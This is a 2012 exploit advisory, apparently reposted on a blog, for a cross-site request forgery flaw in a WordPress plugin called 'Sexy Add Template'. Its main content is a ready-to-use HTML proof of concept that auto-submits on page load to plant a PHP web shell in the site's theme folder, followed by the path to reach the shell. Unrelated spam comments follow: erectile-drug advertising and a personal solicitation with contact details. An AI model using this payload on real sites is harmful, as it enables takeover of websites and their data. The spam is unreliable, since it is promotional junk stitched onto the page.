1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
0 [x] Official Website: http://www.1337day.com 1
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 0
0 1
1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0
0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1
1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
||| Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability |||
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
./Title Exploit : Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability
./Link Download : http://wordpress.org/extend/plugins/sexy-add-template/
./Author Exploit: [ TheCyberNuxbie ] [ root@31337sec.com ] [ nux_exploit ]
./Security Risk : [ Critical Level ]
./Category XPL : [ WebApps/ZeroDay ]
./Tested On : Mozilla Firefox + Xampp + Windows 7 Ultimate x32 ID
./Time & Date : September, 22 2012. 10:27 AM. Jakarta, Indonesia.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
||| -=[ Use It At Your Risk ]=- |||
||| This Was Written For Educational Purpos Only |||
||| Author Will Be Not Responsible For Any Damage |||
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
#################################################################################
#
# [ Information Details ]
# - Wordpress Plugin Sexy Add Template:
# Attacker allow CSRF Upload Shell.
# http://localhost/wp-admin/themes.php?page=AM-sexy-handle <--- Vuln CSRF, not require verification CODE "wpnonce".
#
# <html>
# <head>
# <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
# <title>Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability</title>
# </head>
# <body onload="document.form0.submit();">
# <form method="POST" name="form0" action="http://localhost/wp-admin/themes.php?page=AM-sexy-handle" method="post" enctype="multipart/form-data" >
# <input type="hidden" name="newfile" value="yes" />
# <input type="hidden" type="text" value="shell.php" name="AM_filename">
# <textarea type="hidden" name="AM_file_content">
# [ Your Script Backdoor/Shell ]
# </textarea>
# </form>
# </body>
# </html>
#
# - Access Shell:
# http://localhost/wp-content/themes/[theme-name]/shell.php
Fellas, following time you purchase the pill, talk to your companions if they require a person.
ReplyDeleteThis should double up the sale from the anti-impotence medication Cialis.
A modern getting signifies that the erectile dysfunction capsule which has pepped up the sexual life of adult
males is proving being helpful in the event of gals struggling from a sexual disinterest.
The analysis underlines the medicine functions for females just as much as it does
in the event of adult males if not far more.
Also visit my web site: Erection Treatment Pills Summer 2013 - www.erectionpillssummer.com
Do contact me if u r in chennai : ramyadivya24@gmail.com
ReplyDelete